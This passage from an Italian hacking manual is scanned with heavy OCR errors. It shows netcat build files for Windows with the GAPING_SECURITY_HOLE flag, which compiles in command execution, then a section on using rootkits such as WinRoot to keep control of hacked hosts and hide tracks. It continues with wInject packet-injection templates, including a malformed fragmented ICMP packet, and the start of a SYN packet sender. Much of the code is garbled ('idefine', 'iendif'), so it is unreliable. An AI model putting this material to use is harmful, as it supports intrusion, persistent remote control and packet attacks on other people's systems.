printf ("option a\n") ; 
break; 



case 'b ' : 

printf ("option b\n") ; 
break; 



case ' c ' : 

printf ("option c with value ~%s'\n", optarg) ; 
break; 

case ' ? ' : 
break; 

default : 

printf ("?? getopt returned character code 0%o ??\n", c) ; 

} 

} 

if (optind < argc) 
{ 

printf ("non— option ARGV-elements : ") ; 
while (optind < argc) 

printf ("%s ", argv[optind++] ) ; 
printf ("\n"); 

} 

exit (0) ; 

} 



iendif /* TEST */ 



Gli ultimi file sono quelli relativi al Makefile per la compilazione : 
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cc=cl 
link=link 

cflags=/nologo /ML /W3 /GX /02 /D "NDEBUG" /D "WIN32" /D "__CONSOLE" /D "TELNET" /D 
"GAPING_SECURITY_HOLE" /YX /ED /c 

lflags=kernel32 . lib user32.1ib wsock32.1ib winmm. lib /nologo /subsystem: console 
/incrementai : yes /machine : 1386 /out:nc.exe 

ali: nc.exe 

getopt.obj: getopt.c 

$ (ce) $ (cflags) getopt.c 

doexec.obj : doexec.c 

$ (ce) $ (cflags) doexec.c 

netcat.obj : netcat.c 

$ (ce) $ (cflags) netcat.c 



ne . exe : getopt . obj doexec . obj neteat . obj 

$ (link) getopt.obj doexec.obj netcat.obj $ (lflags) 



E due file di INCLUDE e precisamente generic.h 



/* generic.h — anything you don't iundef at the end remains in effect. 
The ONLY things that go in here are generic indicator flags; it ' s up 
to your programs to declare and cali things based on those flags. 

You should only need to make changes via a minimal system-speci fic section 
at the end of this file. To build a new section, rip through this and 
check everything it mentions on your platform, and iundef that which needs 
it . If you generate a system-speci fic section you didn't find in here, 
please mail me a copy so I can update the "master" . 

I realize I 'm probably inventing another pseudo-standard here, but 
goddamnit, everybody ELSE has already, and I can 't include ali of their 
hairball schemes too. HAVE_xx conforms to the gnu/autoconf usage and 
seems to be the most common format. In fact, I dug a lot of these out 
of autoconf and tried to common them ali together using "stupidh" to 
collect data from platforms . 

In disgust. . . _H* 940910, 941115. Pseudo-version : 1.1 */ 

iifndef GENERIC H /* only run through this once */ 

idefine GENERICA 

/ir =============================== */ 

/* System calls, lib routines, etc */ 
/, =============================== */ 

/* How does your system declare malloc, void or char? Usually void, but go 

ask the SunOS people why they had to be different ... */ 
idefine VOID_MALLOC 

/* notably from fwtk/ firewall . h : posix locking? */ 
idefine HAVE_FLOCK /* otherwise it 's lockf() */ 

/* if you don't have setsidf) , you might have setpgrpf). 
idefine HAVE_SETSID 

/* randomf) is generally considered better than rand() */ 
/* xxx: rand48? */ 
idefine HAVE_RANDOM 

/* if your machine doesn't have lstat(), it should have stat() [dos...] */ 
idefine HAVE_LSTAT 

/* different kinds of term ioctls. How to recognize them, very roughly: 
sysv/POSIX_ME_HARDER: termio[s] .h, struct termio[s], tty.c_*[] 
bsd/old stuff: sgtty.h, ioctl (TIOCSETP) , sgttyb. sg_* , tchars.t__* 

idefine HAVE__ TERMIOS 
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/* dbm vs ndbm */ 
idefine HAVE__NDBM 

/* extended utmp/wtmp stuff. MOST machines stili do HOT have this SV-ism */ 
idefine UTMPX 

/* some systems have nice() which takes *relative* values... [resource.h] */ 
idefine HAVE_SETPRIORITY 

/* a sysvism, I think, but ... */ 
idefine HAVE_SYSINFO 

/* punted for now: setown / siocspgrp . . . see firewall. h */ 

/ir ============= */ 

/* Include files */ 
/* ============= */ 

/* Presenoe of these can be determined via a script that sniffs them 
out if you aren't sure. */ 

/* stdlib comes with most modem compilers, but ya never know */ 
idefine HAVE_STDLIB_H 

/* not on a DOS box! */ 
idefine HAVE_ UNISTD_H 

/* stdarg is a weird one */ 
idefine HAVE_STDARG_H 

/* dir. h or maybe ndir.h otherwise. */ 
idefine HAVE_DIRENT_H 

/* string or strings */ 
idefine HAVE_STRINGS_H 

/* if you don't have lastlog.h, what you want might be in login.h */ 
idefine HAVE_LASTLOG_H 

/* predefines for _PATH_various */ 
idefine HAVE_PATHS_H 

/* assorted others */ 
idefine HAVE_PARAM_H 

idefine HAVE_SYSMACROS_H /* in sys/! */ 

idefine HAVE_TTYENT_H /* securetty et al */ 

/* ==================== */ 

/* Stili maybe have to do something about the following, if it 's even 
worth it . I just grepped a lot of these out of various code, without 
looking them up yet : 

idefine HAVE_EINPROGRESS 
idefine HAVE_F_SETOWN 

idefine HAVE^SETENV . . . now *there ' s* a hairy one; **environ is portable 
idefine BIGENDIAN/littleendian . . . *please* try to avoid this stupidity 
idefine HAVE_GETUSERSHELL . . . you could always pulì it out of getpwent () 
idefine HAVE_SETE [UG] ID . . . lib or syscall, it varies on diff platforms 
idefine HAVE_STRCHR . . . should actually be handled by string/ strings 
idefine HAVEPSTAT 

idefine HAVE_ST_BLKSIZE ... a stat () thing? 
idefine HAVE_IP__TOS 

idefine HAVE_STRFTIME . . . screw this, we should just INCLUDE one for lame 

old boxes that don't have it [sunos 3.x, early 4.x?] 
idefine RAVE_ VFPRINTF 

idefine HAVE_SHADOW_PASSWD ... in its multitudinous schemes?? . . . how 

about sumpin ' like idefine SHADOW_PASSWD_TYPE . . . could get grody. 
idefine SIG* . . . what a swamp, punt for now; should ali be in signal . h 
idefine HAVE_STRCSPN . . . see larry wall 's comment in the fwtk regex code 
idefine ULTRIX_AUTH . . . bwahaha . 

idefine HAVE_YP or NIS or whatever you wanna cali it this week 
randomness about VARARGS ? ? 
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*/ 

/* ======================== v 

/* System-specific sections */ 
/ir ======================== */ 

/* By turning OFF various bits of the above, you can customize for 
a given piattona . /* 

/* DOS boxes, with MSC; you may need to adapt to a different compiler . */ 

iifdef MSDOS 

iundef HAVE_FLOCK 

iundef HAVE_RANDOM 

iundef HAVE_LSTAT 

iundef HAVE_ TERMIOS 

iundef UTMPX 

iundef HAVE_SYSINFO 

iundef HAVE_UNISTD_H 

iundef HAVE_DIRENT_H /* unless you have the kOOl little wrapper from L5 ! ! */ 

iundef HAVE_STRINGS__H 

iundef HAVE_LASTLOG_H 

iundef HAVE_PATHS_H 

iundef HAVE_PARAM_H 

iundef HAVE_SYSMACROS_H 

iundef HAVE_TTYENT_H 

iendif /* MSDOS */ 

/* buglix 4.x; dunno about 3.x on down. should be bsd4.2. */ 

iifdef ULTRIX 

iundef UTMPX 

iundef HAVE_PATHS_H 

iundef HAVE_SYSMACROS_H 

iendif /* buglix */ 

/* some of this might stili be broken on older sunoses */ 

iifdef SUNOS 

iundef VOID_MALLOC 

iundef UTMPX 

iundef HAVE_PATHS_H 

iendif /* sunos */ 

/* "contact your vendor for a fix" */ 

iifdef SOLARIS 

/* has UTMPX */ 

iundef HAVE_SETPRIORITY 

iundef HAVE_STRINGS_H /* this is genuinely the case, go figure */ 
iundef HAVE_PATHS_H 
iundef HAVE_TTYENT_H 
iendif /* SOLARIS */ 

/* whatever aix variant MIT had at the time */ 

iifdef AIX 

iundef UTMPX 

iundef HAVE_LAS TLOG H 

idefine HAVE_LOGIN_H /* "special ", in the educational sense */ 
iendif /* aix */ 

/* linux, which is trying as desperately as the gnu folks can to be 

POSIXLY_CORRECT . I think I'm gonna hurl . . . */ 
iifdef LINUX 
iundef UTMPX 
iundef HAVE_SYSINFO 
iundef HAVE_TTYENT_H 
iendif /* linux */ 

/* irix 5.x; may not be correct for earlier ones */ 
iifdef IRIX 

/* vomì, does irix really have everything? ! */ 
iendif /* irix */ 

/* osf on alphas */ 
iifdef OSF 
iundef UTMPX 
iendif /* osf */ 
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iifdef FREEBSD 
iundef UTMPX 
iundef HAVE_SYSINFO 
gundef HAVE_LASTLOG_H 
iundef HAVE_SYSMACROS_H 
iendif /* freebsd */ 

/* From the sidewinder site, of ali places; may be unreliable */ 

iifdef BSDI 

iundef UTMPX 

iundef HAVE_LASTLOG_H 

iundef RAVE_SYSMACROS_H 

iundef HAVE_TTYENT_H 

/* and their malloc . h was in sys/ ?! */ 
iendif /* bsdi */ 

/* netbsd/441ite, jives with amiga-netbsd from cactus */ 

iifdef NETBSD 

iundef UTMPX 

iundef HAVE^SYSINFO 

iundef HAVE_LAS TLOG__H 

iendif /* netbsd */ 

/* Make some "generic" assumptions if ali else fails */ 
iifdef GENERIC 
iundef HAVE_FLOCK 

iif defined(SYSV) SS (SYSV < 4) /* TW leftover: old SV doesnt have symlinks */ 

iundef HAVE_LSTAT 

iendif /* old SYSV */ 

iundef HAVE_ TERMIOS 

iundef UTMPX 

iundef HAVE_PATHS_H 

iendif /* generic */ 

/* ================ */ 

iendif /* GENERIC_H */ 



E getopt.h 



iifndef _GETOPT_H 
idefine __GETOPT_H 1 

iifdef cplusplus 

extern "C" { 
iendif 

/* For communication from 'getopt ' to the Caller. 

When " getopt ' finds an option that takes an argument, 

the argument value is returned here. 

Also, when ' ordering' is RETURN_IN_ORDER, 

each non— option ARGV—element is returned here. */ 

extern char *optarg; 

/* Index in ARGV of the next element to be scanned. 

This is used for communication to and from the Caller 

and for communication between successive calls to ^getopt'. 

On entry to 'getopt ' , zero means this is the first cali; initialize . 

When 'getopt ' returns EOF, this is the index of the first of the 
non— option elements that the Caller should itself scan. 

Otherwise, 'optind' communicates from one cali to the next 
how much of ARGV has been scanned so far. */ 

extern int optind; 

/* Callers store zero here to inhibit the error message 'getopt ' prints 
for unrecognized options . */ 

extern int opterr; 
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extern int optopt; 

/* Describe the long-named options requested by the application. 

The LONG_OPTIONS argument to getopt^long or getopt_long__only is a vector 
of * struct option ' terminated by an element containing a name which is 
zero. 

The field *has_arg' is: 

no_argument (or 0) if the option does not take an argument, 

required_argument (or 1) if the option requires an argument, 
optionalargument (or 2) if the option takes an optional argument . 

If the field "flag' is not NULL, it points to a variable that is set 
to the value given in the field 'vai' when the option is found, but 
left unchanged if the option is not found. 

To have a long-named option do something other than set an "int ' to 
a compiled-in Constant, such as set a value from 'optarg', set the 
option ' s 'flag' field to zero and its 'vai' field to a nonzero 
value (the equivalent single-letter option character, if there is 
one) . For long options that have a zero "flag' field, 'getopt' 
returns the contents of the "vai ' field. */ 

struct option 
{ 

iif defined ( STDC ; SS STDC 

const char *name; 
ielse 

char *name; 
iendif 

/* has^arg can't be an enum because some compilers complain about 
type mismatches in ali the code that assumes it is an int . */ 
int has_arg; 
int *flag; 
int vai; 

ì; 

/* Names for the values of the 'has_arg' field of 'struct option'. */ 

idefine no_argument 0 
idefine required__argument 1 
idefine optional^argument 2 

Hf defined ( STDC ; SS STDC 

iifdef GNU_LIBRARY 

/* Many other libraries have conflicting prototypes for getopt, with 
differences in the consts, in stdlib.h. To avoid compilation 
errors, only prototype getopt for the GNU C library . */ 

extern int getopt (int argc, char *const *argv, const char *shortopts) ; 

ielse /* not GNU LIBRARY */ 

extern int getopt () ; 

iendif /* GNU_LIBRARY */ 

extern int getopt__long (int argc, char *const *argv, const char *shortopts , 

const struct option *longopts , int *longind) ; 
extern int getopt_long_only (int argc, char *const *argv, 

const char *shortopts, 

const struct option *longopts , int *longind) ; 

/* Internai only. Users should not cali this directly . */ 
extern int _getopt_internal (int argc, char *const *argv, 

const char *shortopts , 

const struct option *longopts , int *longind, 
int long_only) ; 

ielse /* not STDC */ 

extern int getopt () ; 
extern int getopt_long () ; 
extern int getopt long_only () ; 

extern int __getopt_internal () ; 
iendif /* STDC_ */ 



iifdef cplusplus 

} 

iendif 
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Rootkit 

Quelli definiti con il termine di rootkit sono il passo successivo all'avvenuto hackeraggio di un 
sistema. 

Cosa significa questo ? 

Una volta che ci si è riusciti ad accedere ad un sistema è necessario inserire in questo i 
meccanismi per fare in modo che successivamente il controllo di questo sia una cosa 
semplice. 

Il nuovo computer di cui ci si è impossessati diventa il punto centrale per l'esecuzione di altri 
attacchi. 

Ricordiamoci che hackerare un sistema significa compiere un gran numero di operazioni tra 

cui quelle di riuscire a coprire le proprie tracce per cui usando come base un sistema di cui si 

possiede già l'accesso a livello di root la cosa diventa ancora più semplice. 

I sistemi di rootkit permettono di gestire il nuovo sistema da remoto. 

Generalmente quelli definiti con il termine di rootkit sono suddivisi in quattro gruppi di tools: 

Programmi trojans come ad esempio versioni alterate di login 
Backdoors 
Sniffers d'interfacce 
Eliminatori di log 

Originariamente i rootkit eranob stati progettati per ambienti Unix anche se ultimamente 
anche quelli per ambiente Windows sono comparsi. 

Alcune parti di rootkit li abbiamo visti nei capitoli in cui si è parlato dei metodi legati alla loro 
installazione sui sistemi mediante i vari BUGS legati ai WEB come ad esempio I' UNICODE 
BUG e MSADC BUG. 

In quel caso avevamo visto uno di queli che gestisce esclusivamente la parte di backdoor. 
Uno di quelli per ambiente Windows che è possibile reperire sulla rete si chiama : 



Il file WinRoot-148-Package.zip contiene diversi files e precisamente : 



WinROOTHub.EXE 


- The WinROOT hub application 


WinROOT FireServer.EXE 


- The WinROOT Firewall Server 


WinROOTCIient.EXE 


- The WinROOT Client Application 


WinROOT Server.EXE 


- The WinROOT Server Application 
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La parte server può essere rinominata come si vuole e deve essere piazzata sull' host che si 
vuole controllare. 

La parte client è invece costituita da un certo numero di pulsanti che dopo aver permesso la 
connessione con un server permettono di svolgere le varie funzioni su questo. 

W inj ect 

Parlando di COMMVIEW avevamo visto come era possibile creare pacchetti TCP. 



FriendFìndercom 

The Iargesi online persvnak site 




H 



wINJECT 



rclrjgs for Windows] 
Windows 9ìì and Windows £000 



(é4Q]r4aQ, lÉbit colora SJpdated: 3Q-dec-2f] 




Esiste sotto Windows un programma che viene definito con il termine di packet injector il cui 
nome è wlnject. 
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wINJECT v0.96b 



nartè 



[Status: Ready 



Global IPs| 



— 



Field: ■ 



New | Rennove | 



Clone 



[drugs for Windows] 



Racket: 

New Rennove 



| Rennove | 



Open | Save 



Info | HewView| 



Loop: | 1 ~ri 
Delay: | 0_3 
Inject Racket 



Mise: 



Settings | About| 



■ Project: — 

Open | Save | 
Loop: | ì~3 
Delay: | 0_3 
Inject Project | 



Il programma funziona dopo che avete prelevato ed installato dai siti Microsoft DUN1 .3 e 
WSOCK2. 

I due Links sono quelli che seguono. 

http://www.microsoft.com/windows95/downloads/contents/WURecommended/S_WUNetworki 
ng/dun1 3win95/Default.asp 

http://www.microsoft.com/windows95/downloads/contents/WUAdminTools/S_WUNetworkingT 
ools/W95Sockets2/Default.asp 

Installate prima DUN1 .3 e poi Wsock. 

Le seguenti sezioni sono riportate per semplificare la vita ai non esperti in modo che abbiano 
ben chiare le strutture di alcuni protocolli. 



IP HERDER: 






4 


bit 


ip_v 


; ver sion 




4 


bit 


ip_hl 


;header length 




8 


bit 


ip_tos 


; type of service 




16 


bit 


ip_len 


; total length 




16 


bit 


ip_id 


; Identification 




16 


bit 


ip_off 


; fragment offset field 




8 


bit 


ip_ttl 


;time to live 




8 


bit 


ip_j> 


/protocol 




16 


bit 


ip_cksum 


; checksum 




32 


bit 


ip_src 


; source address 




32 


bit 


ip_dst 


;destination address 




ICMP 


HE AD E R : 






8 bit type 






8 bit code 






16 


bit 


checksum 






16 


bit 


id 






16 


bit 


seq 






Assigned 


Internet Protocol Numbers rfcl 700 




Decimai 


Keyword 


Protocol 


References 




0 




Reserved 


[JBP] 




1 


ICMP 


Internet Control Message 


[RFC792, JBP] 




2 


IGMP 


Internet Group Management 


[RFC1112, JBP] 




3 


GGP 


Gateway-to-Gateway 


[RFC823,MB] 




4 


IP 


IP in IP (encasulation) 


[JBP] 
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6 


TCP 


Transmlsslon Control 


[RFC793, JBP] 


7 


UCL 


UCL 


[PK] 


8 


EGP 


Exterlor Gateway Protocol 


[RFC888,DLM1] 


9 


IGP 


any private interior gateway 


[JBP] 


10 


BBN-RCC-MON 


BBN RCC Monitoring 


[SGC] 


11 


NVP-II 


Network Voice Protocol 


[RFC741, SC3] 


12 


PUP 


PUP 


[PUP, XEROX] 


13 


ARGUS 


ARGUS 


[RWS4] 


14 


EMCON 


EMCON 


[BN7] 


15 


XNET 


Cross Net Debugger 


[ IEN158, JFH2 ] 


16 


CHAOS 


Chaos 


[NC3] 


17 


UDP 


User Datagram 


[RFC768, JBP] 


18 


MUX 


Multiplexing 


[IEN90, JBP] 


19 


DCN-MEAS 


DCN Measurement Subsystems 


[DLM1] 


20 


HMP 


Host Monitoring 


[RFC869,RH6] 


21 


PRM 


Packet Radio Measurement 


[ZSU] 


22 


XNS-IDP 


XEROX NS IDP [ETHERNET, XEROX] 


23 


TRUNK-1 


Trunk-1 


[BWB6] 


24 


TRUNK-2 


Trunk-2 


[BWB6] 


25 


LEAF-1 


Leaf-1 


[BWB6] 


26 


LEAF—2 


Leaf-2 


[BWB6] 


27 


RDP 


Reliable Data Protocol 


[RFC908,RH6] 


28 


IRTP 


Internet Reliable Transaction 


[RFC938, TXM] 


29 


ISO-TP4 


ISO Transport Protocol Class 4 


[RFC905, RC77] 


30 


NETBLT 


Bulk Data Transfer Protocol 


[RFC969,DDC1] 


31 


MFE-NSP 


MFE Network Services Protocol 


[MFENET, BCH2] 


32 


MERIT-INP 


MERIT Internodal Protocol 


[HWB] 


33 


SEP 


Sequential Exchange Protocol 


[JC120] 


34 


3PC 


Third Party Connect Protocol 


[SAF3] 


35 


IDPR 


Inter-Domain Policy Routing Protocol [MXS1 ] 


36 


XTP 


XTP 


[GXC] 


37 


DDP 


Datagram Delivery Protocol 


[WXC] 


38 


IDPR-CMTP 


IDPR Control Message Transport 


Proto [MXS1] 


39 


TP++ 


TP++ Transport Protocol 


[DXF] 


40 


IL 


IL Transport Protocol 


[DXP2 ] 


41 


SIP 


Simple Internet Protocol 


[SXD] 


42 


SDRP 


Source Demand Routing Protocol 


[DXE1 ] 


43 


SIP-SR 


SIP Source Route 


[SXD] 


44 


SIP-FRAG 


SIP Fragment 


[SXD] 


45 


IDRP 


Inter-Domain Routing Protocol 


[Sue Hares] 


46 


RSVP 


Reservation Protocol 


[Bob Braden] 


47 


GRE 


General Routing Encapsulation 


[Tony Li] 


48 


MHRP 


Mobile Host Routing Protocol [David Johnson] 


49 


BNA 


BNA [Gary Salamon] 


50 


SIPP-ESP 


SIPP Encap Security Payload [Steve Deering] 


51 


SIPP-AH 


SIPP Authentication Header [Steve Deering] 


52 


I-NLSP 


Integrated Net Layer Security 


TUBA [GLENN] 


53 


SWIPE 


IP with Encryption 


[JI6] 


54 


NHRP 


NBMA Next Hop Resolution Protocol 


■60 




Unassigned 


[JBP] 


61 




any host internai protocol 


[JBP] 


62 


CFTP 


CFTP 


[CFTP, HCF2 ] 


63 




any locai network 


[JBP] 


64 


SAT-EXPAK 


SATNET and Backroom EXPAK 


[SHB] 


65 


KRYPTOLAN 


Kryptolan 


[PXL1 ] 


66 


RVD 


MIT Remote Virtual Disk Protocol [MBG] 


67 


IPPC 


Internet Pluribus Packet Core 


[SHB] 


68 




any distributed file system 


[JBP] 


69 


SAT-MON 


SATNET Monitoring 


[SHB] 


70 


VISA 


VISA Protocol 


[GXT1 ] 


71 


IPCV 


Internet Packet Core Utility 


[SHB] 


72 


CPNX 


Computer Protocol Network Executive [DXM2] 


73 


CPHB 


Computer Protocol Heart Beat 


[DXM2] 


74 


WSN 


Wang Span Network 


[VXD] 


75 


PVP 


Packet Video Protocol 


[SC3] 


76 


BR—SA T—MON 


Backroom SATNET Monitoring 


[SHB] 


77 


SUN-ND 


SUN ND PROTOCOL-Temporary 


[WM3] 
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79 


WB-EXPAK 


WIDEBAND EXPAK 


[SHB] 


80 


ISO-IP 


ISO Internet Protocol 


[MTR] 


81 


VMTP 


VMTP 


[DRC3] 


82 


SECURE-VMTP 


SECURE-VMTP 


[DRC3] 


83 


VINES 


VINES 


[BXH] 


84 


TTP 


TTP 


[JXS] 


85 


NSFNET-IGP 


NSFNET-IGP 


[HWB] 


86 


DGP 


Dissimilar Gateway Protocol [DGP,ML109] 


87 


TCF 


TCF 


[GAL5] 


88 


IGRP 


IGRP [CISCO, GXS] 


89 


OSPFIGP 


OSPFIGP [RFC1583, JTM4 ] 


90 


Sprite-RPC 


Sprite RPC Protocol [SPRITE,BXW] 


91 


LARP 


Locus Address Resolution Protocol 


[BXH] 


92 


MTP 


Multicast Transport Protocol 


[SXA] 


93 


AX.25 


AX.25 Frames 


[BK29] 


94 


IPIP 


IP-within-IP Encapsulation Protocol 


[JI6] 


95 


MICP 


Mobile Internetworking Control Pro. 


[JI6] 


96 


SCC-SP 


Semaphore Communications Sec. Pro. 


[HXH] 


97 


ETHERIP 


Ethernet-within-IP Encapsulation 


[RXH1] 


98 


ENCAP 


Encapsulation Header [RFC1241 ,RXB3] 


99 




any private encryption scheme 


[JBP] 


100 


GMTP 


GMTP 


[RXB5] 


101-254 




Unasslgned 


[JBP] 


255 




Reserved 


[JBP] 


ICMP TYPE NUMBERS 






The Internet Control Message Protocol (ICMP) has many messages that 


are identified by a "type" field. 




Type 


Name 


Reference 




0 


Echo Reply 


[RFC792] 




1 


Unasslgned 


[JBP] 




2 


Unasslgned 


[JBP] 




3 


Destlnatlon Unreachable [RFC792] 




4 


Source Quench 


[RFC792] 




5 


Redlrect 


[RFC792] 




6 


Alternate Host 


Address [ JBP ] 




7 


Unasslgned 


[JBP] 




8 


Echo 


[RFC792] 




9 


Router Advertlsement [RFC1256] 




10 


Router Selection [RFC1256] 




11 


Time Exceeded 


[RFC792] 




12 


Parameter Problem [RFC792] 




13 


Tlmestamp 


[RFC792] 




14 


Timestamp Reply [RFC792] 




15 


Information Reguest [RFC792] 




16 


Information Reply [RFC792] 




17 


Address Mask Request [RFC950] 




18 


Address Mask Reply [RFC950] 




19 


Reserved (for Security) [Solo] 




20-29 


Reserved (for Robustness Experiment) [ZSu] 




30 


Traceroute 


[RFC1393] 




31 


Datagram Conversion Error [RFC1475] 




32 


Mobile Host Redirect [David Johnson ] 




33 


IPv6 Where-Are- 


-You [Bill Simpson ] 




34 


IPv6 I-Am-Here 


[Bill Simps on ] 




35 


Mobile Registration Request [Bill Simpson ] 




36 


Mobile Registration Reply [Bill Simpson ] 




37-255 


Reserved 


[JBP] 




Many of 


these ICMP types have a "code" field. Here we list 


the types 


agaln wlth their assigned code fields. 




Type 


Name 


Reference 
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0 Echo Reply [RFC792] 
Codes 

0 No Code 

1 Unassigned [JBP] 

2 Unassigned [JBP] 

3 Destination Unreachable [RFC792] 
Codes 

0 Net Unreachable 

1 Host Unreachable 

2 Protocol Unreachable 

3 Port Unreachable 

4 Fragmentation Needed and Don't Fragment was Set 

5 Source Route Failed 

6 Destination Network Unknown 

7 Destination Host Unknown 

8 Source Host Isolated 

9 Conmunication with Destination Network is 
Administratively Prohibited 

10 Communication with Destination Host is 
Administratively Prohibited 

11 Destination Network Unreachable for Type of Service 

12 Destination Host Unreachable for Type of Service 

4 Source Quench [RFC792] 
Codes 

0 No Code 

5 Redirect [RFC792] 
Codes 

0 Redirect Datagram for the Network (or subnet) 

1 Redirect Datagram for the Host 

2 Redirect Datagram for the Type of Service and Network 

3 Redirect Datagram for the Type of Service and Host 

6 Alternate Host Address [JBP] 
Codes 

0 Alternate Address for Host 

7 Unassigned [JBP] 

8 Echo [RFC792] 
Codes 

0 No Code 

9 Router Advertisement [RFC1256] 
Codes 

0 No Code 

10 Router Selection [RFC1256] 
Codes 

0 No Code 

11 Time Exceeded [RFC792] 
Codes 

0 Time to Live exceeded in Transit 

1 Fragment Reassembly Time Exceeded 

12 Parameter Problem [RFC792] 
Codes 

0 Pointer indicates the error 

1 Missing a Required Option [RFC1108] 

2 Bad Length 

13 Timestamp [RFC792] 
Codes 
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14 


Tlmestamp Reply 
Codes 

0 No Code 




[RFC792] 


15 


Information Reguest 
Codes 

0 No Code 




[RFC792] 


16 


Information Reply 
Codes 

0 No Code 




[RFC792] 


17 


Address Mask Request 
Codes 

0 No Code 




[RFC950] 


18 


Address Mask Reply 
Codes 

0 No Code 




[RFC950] 


19 


Reserved (for Security) 




[Solo] 


20-29 


Reserved (for Robustness Experiment) 


[ZSu] 


30 


Traceroute 




[RFC1393] 


31 


Datagram Conversion Error 




[RFC14 75] 


32 


Mobile Host Redirect 


[David Johnson ] 


33 


IPv6 Where-Are-You 


[Bill 


Simpson ] 


34 


IPv6 I-Am-Here 


[Bill 


Simpson ] 


35 


Mobile Registration Reguest 


[Bill 


Simpson ] 


36 


Mobile Registration Reply 


[Bill 


Simpson ] 



NetBIOS Services: 

The table below lists some common services that names can be bound to 
and the hex value that denotes that service: 

Unique Names 

computer_name 00 Workstation Service or base computer name 

computer_name 20 Server Service 

domain_name 1B Domain Master Browser 

computer_name 03 Messenger Service 

user_name 03 Messenger Service 

domain_name 1D Master Browser 

computer_name 06 Remote Access Server Service 
computer_name 1F Net DDE Service 
computer_name 21 RAS Client Service 
computer_name BE Network Monitor Agent 

computer_name BF Network Monitor Application {any spaces are replaced with 
+s} 



Group Names 

domain_name 00 Domain Name 

domain_name 1C Domain Controller (A PDC will also have unique Domain Name 
1B} 

domain_name 1E Browser Service Elections 

wlnject riesce a leggere i pacchetti creati con COMVIEW. 
È possibile memorizzare i pacchetti creati in formato .PKT e poi rileggerli in futuro. 
Ad esempio quello che segue è un pacchetto NETBIOS. 
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[NODE STATUS REQUEST] 



; "Almost" like using the Windows command "nbtstat -A <dst_ip>" . 
;Use a sniffer to see the result from <dst_ip> . 

;by moofz 

r 

1 IP_Version b: 4 0 4 

1 IP_HdrLen b: 4 0 5 

1 IP_Tos b: 8 0 0 

1 IP_TotLen b: 16 0 78 

1 IP_Id b: 16 0 1 

1 IP_FragOff b: 16 0 0 

1 IP_TTL b: 8 0 128 

1 IP_Proto b: 8 0 17 

1 IP_Hcksum b: 16 3 [Checksum] 

1 IP_Src b: 32 5 [Dynamic IP] 

1 IP_Dst b: 32 4 0.0.0.0 

2 Pseudo_SlP b: 32 15 [Dynamic IP] 
2 Pseudo_DIP b: 32 14 0.0.0.0 

2 Pseudo_Zero b: 8 10 0 

2 Pseudo_Proto b: 8 10 17 

2 Pseudo_Len b: 16 10 58 

2 udp_sport b: 16 0 137 

2 udp_dport b: 16 0 137 

2 udp_length b: 16 0 58 

2 udp_csum b: 16 3 [Checksum] 

2 NB_id b: 16 1 56 

2 NB_opcode b: 5 0 0 

2 NB_nmflags b: 7 0 1 

2 NB_rcode b: 4 0 0 

2 NB_qdc b: 16 1 1 

2 NB_anc b: 16 1 0 

2 NB_nsc b: 16 1 0 

2 NB_arc b: 16 1 0 

2 NB_len b: 8 0 32 

2 NB_String B: 32 2 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
2 NB_term b: 8 0 0 
2 NB_qtype b: 16 1 21 



Questo è un altro formato di pacchetto. 

"Creative" use of a [Random IP] field. 
Explanation: [x.x. 32 .x] 

x.x = Random ID field (also try fixed values here) 
32 = Unused:O r DF : 0, More: 2 5Bits_Offset:0 
x = Random fragment offset 

You can also just use: x.x. x.x and hope for good random shit . 
by moofz 

1 IP_Version b: 4 0 4 

1 IP_HdrLen b: 4 0 5 

1 IP_Tos b: 8 0 0 

1 IP_TotLen b: 16 0 1500 

1 IP_Id+Offset b: 32 6 x.x. 32. x 

1 IP_TTL b: 8 0 128 

1 IP_Proto b: 8 0 1 

1 IP_Hcksum b: 16 3 [Checksum] 

1 IP_SrcIP b: 32 5 [Dynamic IP] 

1 IP_DstIP b: 32 4 0.0.0.0 

2 ICMP_Type b: 8 0 8 
2 ICMP_Code b: 8 0 0 

2 ICMP_Cksum b: 16 3 [Checksum] 
2 ICMP_ID b: 16 0 1 
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2 ICMP_ 


Data B: 


1472 2 
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AUCH! ! 



Una serie di esempi specializzati in quelle che sono le funzioni da hacker scrivibili usando 

wlnject e libnet sono le seguenti. 

La prima implementa un sistema per l'invio di TCP SYN. 



/* 

* syn . cpp 
* 

* - Implements TCP SYN Packet functionality through wlnject 
* 

* Make sure ; 
* 

* - wlnject 0 . 95b is running 
* 

* Author: FoxThree (foxthree@antlonline.org) 
* 

* Redistribution and use in source and binary forms, with or without 

* modification, are permitted provided that the following conditions 

* are met : 

* 1 . Redistributions of source code must retain the above copyright 

* notice, this list of conditions and the following disclaimer . 

* 2. Redistributions in binary fonti must reproduce the above copyright 

* notice, this list of conditions and the following disclaimer in the 

* documentation and/or other materials provided with the distribution . 
* 

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS 1 ~AS IS ' ' AND 

* ANY EXPRESS OR IMPLIED WARRANTIES , INCLUDING, BUT NOT LIMITED TO, THE 

* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 
PURPOSE 

* ARE DISCLAIMED . IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE 

* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL 

* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 

* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 

* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 
STRICT 

* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 

* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 

* SUCH DAMAGE. 
* 

*/ 



«include "stdafx.h" 
«include " . . \getopt .h" 
«include <libnet . h> 
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/* idefines for the application */ 
tidefine VERSION "1.0" 

/* idefines for the application */ 
#def ine VERSION "1 . 0 " 

/* Function prototypes */ 
int InitWinSock (void) ; 

/* Prints a small header */ 

void PrintHeader () 

{ 

printf ("syn %s - Send a TCP SYN Packet to a remote host via 
wlnject\n", VERSION) ; 

printf ("by foxthree (foxthree@antionline.org)\n\n") ; 

} 

/* Prints the Usage */ 

void PrintUsage () 

{ 

printf ("usage: syn [-n numpackets] [-s src host] [-d dst 
host] \n\nMake sure wlnject is running! ! ! \n\n" ) ; 
} 

/* Hmmm. . . what can this be ?! */ 
int main(int argc, char* argv[]) 
{ 

unsigned long src_ip, dst_ip; 
